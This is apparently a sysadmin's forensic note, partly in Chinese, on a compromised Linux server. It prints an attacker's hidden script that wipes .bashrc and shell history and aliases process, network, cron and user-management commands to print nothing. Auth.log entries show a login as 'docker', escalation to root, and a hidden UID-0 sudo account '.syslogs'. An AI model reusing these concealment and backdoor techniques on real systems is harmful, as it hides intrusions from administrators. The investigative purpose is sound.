~ » cat /var/tmp/.ICMP-Unix/.bombarusa/run #!/bin/bash #made by LupuSclipici if [ $# != 1 ]; then echo" usage: $0 > /dev/null 2>&1 & disown" fi
locatie=$(cat /var/tmp/.log/.local) if [ -f /var/tmp/.log/.local ]; then : else if [ -d /var/tmp/.log ]; then echo $(pwd) > /var/tmp/.log/.local else mkdir /var/tmp/.log echo $(pwd) > /var/tmp/.log/.local fi fi
cat /usr/.SQL-Unix/.SQL/.db # .bashrc ############ rm -rf ~/.bashrc rm -rf ~/.bash_history alias pkill='printf ""' aliaskill='printf ""' alias killall='printf ""' alias init='printf ""' aliasrm='printf ""' alias halt='printf ""' alias adduser='printf ""' alias userdel='printf ""' alias htop='printf ""' alias find='printf ""' alias nano='printf ""' alias locate='printf ""' alias crontab='printf ""' alias ps='printf ""' alias ss='printf ""' alias netstat='printf ""'
~ >> cat /var/log/auth.log Mar 14 05:22:27 shao sshd[16508]: Accepted password for docker from 10.12.41.113 port 56762 ssh2 Mar 14 05:22:27 shao sshd[16508]: pam_unix(sshd:session): session opened for user docker by (uid=0) Mar 14 05:22:27 shao systemd-logind[1229]: New session 154 of user docker. Mar 14 05:22:27 shao systemd: pam_unix(systemd-user:session): session opened for user docker by (uid=0) Mar 14 05:22:45 shao sudo: docker : TTY=pts/11 ; PWD=/home/docker ; USER=root ; COMMAND=/bin/su Mar 14 05:22:45 shao sudo: pam_unix(sudo:session): session opened for user root by docker(uid=0) Mar 14 05:22:45 shao su[16907]: Successful su for root by root Mar 14 05:22:45 shao su[16907]: + /dev/pts/11 root:root Mar 14 05:22:45 shao su[16907]: pam_unix(su:session): session opened for user root by docker(uid=0) Mar 14 05:22:45 shao su[16907]: pam_systemd(su:session): Cannot create session: Already running in a session Mar 14 05:33:23 shao useradd[24859]: new user: name=.syslogs, UID=0, GID=0, home=/home/.syslogs, shell=/bin/bash Mar 14 05:33:23 shao usermod[24865]: add '.syslogs' to group 'sudo' Mar 14 05:33:23 shao usermod[24865]: add '.syslogs' to shadow group 'sudo' Mar 14 05:33:23 shao passwd[24871]: pam_unix(passwd:chauthtok): password changed for .syslogs Mar 14 05:33:23 shao passwd[24871]: gkr-pam: couldn't update the login keyring password: no old password was entered Mar 14 05:33:44 shao su[16907]: pam_unix(su:session): session closed for user root Mar 14 05:33:44 shao sudo: pam_unix(sudo:session): session closed for user root Mar 14 05:33:47 shao sshd[16696]: Received disconnect from 10.12.41.113 port 56762:11: disconnected by user Mar 14 05:33:47 shao sshd[16696]: Disconnected from user docker 10.12.41.113 port 56762 Mar 14 05:33:47 shao sshd[16508]: pam_unix(sshd:session): session closed for user docker
可以看到是docker有漏洞导致被攻陷。
1 2 3 4 5 6 7 8
~ » sudo cat /home/docker/.bash_history nvidia-smi pkill python ls sud osu 1 sudo su exit